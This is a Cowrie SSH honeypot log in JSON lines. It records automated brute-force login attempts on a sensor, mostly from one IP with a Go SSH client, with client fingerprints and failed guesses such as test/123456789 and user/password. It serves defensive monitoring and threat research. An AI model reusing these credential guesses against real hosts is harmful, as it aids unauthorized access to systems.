{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:36:22.151197Z","src_ip":"196.251.115.108","session":"f5451b29a135"}
{"eventid":"cowrie.login.failed","username":"test","password":"123456789","message":"login attempt [test/123456789] failed","sensor":"my-vps","timestamp":"2025-08-24T22:36:25.570462Z","src_ip":"196.251.115.108","session":"f5451b29a135"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:36:26.735333Z","src_ip":"196.251.115.108","session":"f5451b29a135"}
{"eventid":"cowrie.session.closed","duration":31.36030340194702,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:36:43.449663Z","src_ip":"211.229.22.152","session":"57eae7b96745"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":48400,"dst_ip":"1.2.3.4","dst_port":22,"session":"79ae32eca05f","protocol":"ssh","message":"New connection: 196.251.115.108:48400 (1.2.3.4:22) [session: 79ae32eca05f]","sensor":"my-vps","timestamp":"2025-08-24T22:37:12.154074Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:37:12.782622Z","src_ip":"196.251.115.108","session":"79ae32eca05f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:37:12.797184Z","src_ip":"196.251.115.108","session":"79ae32eca05f"}
{"eventid":"cowrie.login.failed","username":"test","password":"12345","message":"login attempt [test/12345] failed","sensor":"my-vps","timestamp":"2025-08-24T22:37:16.529106Z","src_ip":"196.251.115.108","session":"79ae32eca05f"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:37:17.660640Z","src_ip":"196.251.115.108","session":"79ae32eca05f"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":53842,"dst_ip":"1.2.3.4","dst_port":22,"session":"a894fb5a18bf","protocol":"ssh","message":"New connection: 196.251.115.108:53842 (1.2.3.4:22) [session: a894fb5a18bf]","sensor":"my-vps","timestamp":"2025-08-24T22:38:02.500617Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:38:03.095555Z","src_ip":"196.251.115.108","session":"a894fb5a18bf"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:38:03.112205Z","src_ip":"196.251.115.108","session":"a894fb5a18bf"}
{"eventid":"cowrie.login.failed","username":"test","password":"12345678","message":"login attempt [test/12345678] failed","sensor":"my-vps","timestamp":"2025-08-24T22:38:05.351401Z","src_ip":"196.251.115.108","session":"a894fb5a18bf"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:38:06.717257Z","src_ip":"196.251.115.108","session":"a894fb5a18bf"}
{"eventid":"cowrie.session.connect","src_ip":"45.78.197.1","src_port":59210,"dst_ip":"1.2.3.4","dst_port":22,"session":"d846d9ad22ce","protocol":"ssh","message":"New connection: 45.78.197.1:59210 (1.2.3.4:22) [session: d846d9ad22ce]","sensor":"my-vps","timestamp":"2025-08-24T22:38:34.392335Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:38:34.393495Z","src_ip":"45.78.197.1","session":"d846d9ad22ce"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-24T22:38:34.578569Z","src_ip":"45.78.197.1","session":"d846d9ad22ce"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:38:42.392486Z","src_ip":"45.78.197.1","session":"d846d9ad22ce"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":34770,"dst_ip":"1.2.3.4","dst_port":22,"session":"42f3f0101489","protocol":"ssh","message":"New connection: 196.251.115.108:34770 (1.2.3.4:22) [session: 42f3f0101489]","sensor":"my-vps","timestamp":"2025-08-24T22:38:50.818543Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:38:51.147085Z","src_ip":"196.251.115.108","session":"42f3f0101489"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:38:51.147979Z","src_ip":"196.251.115.108","session":"42f3f0101489"}
{"eventid":"cowrie.login.failed","username":"test","password":"qwerty","message":"login attempt [test/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-24T22:38:54.704871Z","src_ip":"196.251.115.108","session":"42f3f0101489"}
{"eventid":"cowrie.session.closed","duration":"5.1","message":"Connection lost after 5.1 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:38:55.923037Z","src_ip":"196.251.115.108","session":"42f3f0101489"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":43956,"dst_ip":"1.2.3.4","dst_port":22,"session":"997620e0e150","protocol":"ssh","message":"New connection: 196.251.115.108:43956 (1.2.3.4:22) [session: 997620e0e150]","sensor":"my-vps","timestamp":"2025-08-24T22:39:40.026857Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:39:40.423315Z","src_ip":"196.251.115.108","session":"997620e0e150"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:39:40.424062Z","src_ip":"196.251.115.108","session":"997620e0e150"}
{"eventid":"cowrie.login.failed","username":"test","password":"123123","message":"login attempt [test/123123] failed","sensor":"my-vps","timestamp":"2025-08-24T22:39:44.175535Z","src_ip":"196.251.115.108","session":"997620e0e150"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:39:45.398108Z","src_ip":"196.251.115.108","session":"997620e0e150"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":59278,"dst_ip":"1.2.3.4","dst_port":22,"session":"c766bb131678","protocol":"ssh","message":"New connection: 196.251.115.108:59278 (1.2.3.4:22) [session: c766bb131678]","sensor":"my-vps","timestamp":"2025-08-24T22:40:27.812517Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:40:28.235904Z","src_ip":"196.251.115.108","session":"c766bb131678"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:40:28.236774Z","src_ip":"196.251.115.108","session":"c766bb131678"}
{"eventid":"cowrie.login.failed","username":"test","password":"111111","message":"login attempt [test/111111] failed","sensor":"my-vps","timestamp":"2025-08-24T22:40:31.789124Z","src_ip":"196.251.115.108","session":"c766bb131678"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:40:33.367240Z","src_ip":"196.251.115.108","session":"c766bb131678"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":60048,"dst_ip":"1.2.3.4","dst_port":22,"session":"d1dceb2df6e4","protocol":"ssh","message":"New connection: 196.251.115.108:60048 (1.2.3.4:22) [session: d1dceb2df6e4]","sensor":"my-vps","timestamp":"2025-08-24T22:41:14.476324Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:41:14.757881Z","src_ip":"196.251.115.108","session":"d1dceb2df6e4"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:41:14.759188Z","src_ip":"196.251.115.108","session":"d1dceb2df6e4"}
{"eventid":"cowrie.login.failed","username":"user","password":"123456","message":"login attempt [user/123456] failed","sensor":"my-vps","timestamp":"2025-08-24T22:41:18.302720Z","src_ip":"196.251.115.108","session":"d1dceb2df6e4"}
{"eventid":"cowrie.session.closed","duration":"5.1","message":"Connection lost after 5.1 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:41:19.584883Z","src_ip":"196.251.115.108","session":"d1dceb2df6e4"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":40526,"dst_ip":"1.2.3.4","dst_port":22,"session":"72871537f0e7","protocol":"ssh","message":"New connection: 196.251.115.108:40526 (1.2.3.4:22) [session: 72871537f0e7]","sensor":"my-vps","timestamp":"2025-08-24T22:42:02.348333Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:42:02.751877Z","src_ip":"196.251.115.108","session":"72871537f0e7"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:42:02.760221Z","src_ip":"196.251.115.108","session":"72871537f0e7"}
{"eventid":"cowrie.login.failed","username":"user","password":"password","message":"login attempt [user/password] failed","sensor":"my-vps","timestamp":"2025-08-24T22:42:06.396491Z","src_ip":"196.251.115.108","session":"72871537f0e7"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:42:07.633868Z","src_ip":"196.251.115.108","session":"72871537f0e7"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":51158,"dst_ip":"1.2.3.4","dst_port":22,"session":"18a2a7c40b62","protocol":"ssh","message":"New connection: 217.72.205.35:51158 (1.2.3.4:22) [session: 18a2a7c40b62]","sensor":"my-vps","timestamp":"2025-08-24T22:42:26.228593Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:42:26.230039Z","src_ip":"217.72.205.35","session":"18a2a7c40b62"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":47616,"dst_ip":"1.2.3.4","dst_port":22,"session":"b2be3753d2d1","protocol":"ssh","message":"New connection: 196.251.115.108:47616 (1.2.3.4:22) [session: b2be3753d2d1]","sensor":"my-vps","timestamp":"2025-08-24T22:42:51.061699Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:42:51.398957Z","src_ip":"196.251.115.108","session":"b2be3753d2d1"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:42:51.399649Z","src_ip":"196.251.115.108","session":"b2be3753d2d1"}
